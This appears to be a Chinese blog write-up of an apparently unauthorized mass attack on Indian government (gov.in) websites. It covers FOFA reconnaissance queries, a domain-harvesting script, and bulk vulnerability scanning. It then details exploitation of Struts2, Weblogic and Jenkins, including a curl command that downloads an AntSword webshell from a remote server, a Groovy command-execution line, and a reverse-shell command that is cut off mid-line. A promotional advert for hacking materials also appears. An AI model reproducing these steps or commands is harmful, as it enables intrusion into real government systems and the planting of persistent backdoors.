0x01、信息收集阶段
注:本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/
一开始进行收集的时候,有点迷,直接进行了大面积的"gov.in"域名收集- host="gov.in" && country="IN"
复制代码data:image/s3,"s3://crabby-images/f39de/f39dea86f499fca29126ba628cc3fc0489b938a4" alt=""
哈哈68465条数据,想想就起飞,但是有个问题来了,怎么下载到本地,高级用户的API也只能调用下载1w条数据,左思右想。
试着写了个脚本看看:- import pythonfofa
- import csv
-
- filename = "IN_domain.csv"
-
- email = 'u_mail'
- key = 'u_API_KEY'
- search = pythonfofa.Client(email, key)
- get_data = search.search('host="gov.in" && country="IN"', size=70000)
- # print(get_data)
-
- requests = [result[1] for result in get_data['results']]
- print(requests)
- # 打开CSV文件并设置写入模式
- with open(filename, "w", newline="") as file:
- writer = csv.writer(file)
-
- # 遍历请求列表
- for request in requests:
- # 在控制台打印域名
- print(request)
-
- # 检测域名是否包含"http://"
- if not request.startswith("http://") and not request.startswith("https://"):
- # 如果不包含,则在域名前添加"http://"
- request = "http://" + request
-
- # 在域名后添加斜杠"/"
- request += "/"
-
- # 将请求和值"1"作为一行写入CSV文件
- writer.writerow([request, 1])
复制代码 是的,肯定不能跑,下断点,调试看看
data:image/s3,"s3://crabby-images/2f05f/2f05f011acb41274c183120b506838b9bd3a0847" alt=""
很好确实是不能直接干7w条,换个收集思路,收集主流框架进行相应的漏扫
主流框架的相关漏洞的FOFA规则语句:
Fastjson- app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")
复制代码 Struts2- app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")
复制代码 Log4j2- (app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443"))
复制代码 其他的也都大同小异,照葫芦画瓢就行。
data:image/s3,"s3://crabby-images/953fe/953fe5800a773d574c8f9cce115be932fa54b177" alt=""
目标站点收集差不多了,就是漏洞探测阶段了。
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
0x02、漏洞探测及利用
Struts2:
直接掏出大范围漏扫AWVS就行批量漏洞探测:
data:image/s3,"s3://crabby-images/6125c/6125c95f9d59a780828d54a62bd02b010c17a74a" alt=""
第一天数据就直接起飞,因为本次目标是==getshell==直接忽略中低危漏洞告警,查看高危漏洞:
data:image/s3,"s3://crabby-images/b5d62/b5d620c6b6ca4439ba4bf5d62fee84eb358618a4" alt=""
很好一堆==Struts2==漏洞,直接上工具:
data:image/s3,"s3://crabby-images/0258e/0258e5a0c26e0a44ec85faa46b69b4f1de70aa75" alt=""
得到一个RCE(远程命令执行漏洞),远程写入==shell==,先利用工具生成一个==Antsword(蚁剑)jsp格式的shell==
data:image/s3,"s3://crabby-images/7c1e9/7c1e915bd880a1538f5e01d10d4d0fcce91ced19" alt=""
将shell放到一个公网服务器上,接着执行命令查看web路径:/var/tomcat9/pmrportal/ROOT/
data:image/s3,"s3://crabby-images/a4abf/a4abf216305a8e463ddf1cd0f9a7a4038fa99f23" alt=""
直接执行- curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp
复制代码 然后webshell工具Antsword连接即可:
data:image/s3,"s3://crabby-images/44f28/44f282ff8001b57c0b6f2d87c769c734f2d4c777" alt=""
爆出的该S2-045的漏洞的还有几个,getshell方式同上,不进行细述了___________。
Weblogic:
data:image/s3,"s3://crabby-images/f04a9/f04a98025cc82cf0a59bd3e9e3623c3f68a55dc1" alt=""
很好用的awvs,直接上工具注入内存马:
data:image/s3,"s3://crabby-images/b1487/b14871d4d85ab3d70d64535890175800379c9905" alt=""
冰蝎连接webshell:
data:image/s3,"s3://crabby-images/a1fc4/a1fc44485f74e525fbfd35b5017cecd5e1452b19" alt=""
同类型的漏洞还有几个,getshell的方式都一致,不一一概述了》》
(PS:这个时候已经有些疲软了,没有去手测upload的点)
Jenkins:
中途其他框架没有收获的时候,就去浏览知识的海洋了,看到一个存在大量未授权+RCE的框架漏洞(Jenkins),二话不说,直接上FOFA:- (app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443")
复制代码data:image/s3,"s3://crabby-images/a3753/a3753ef3bf10ae632ec775f5cb6675fa89f75001" alt=""
一看86条资产,有戏,数量不多,直接手测:
data:image/s3,"s3://crabby-images/6f8e8/6f8e8294dea0ec0a585cf15492507ebe2202c918" alt=""
存在未授权,访问manager --> script页面,进行命令执行测试:- println "ls -al".execute().text
复制代码data:image/s3,"s3://crabby-images/55d93/55d93fd9035292256e3e469a162a43d622440102" alt=""
存在命令执行,尝试反弹shell:
[code]println "bash -i >& /dev/tcp/ip/port 0 |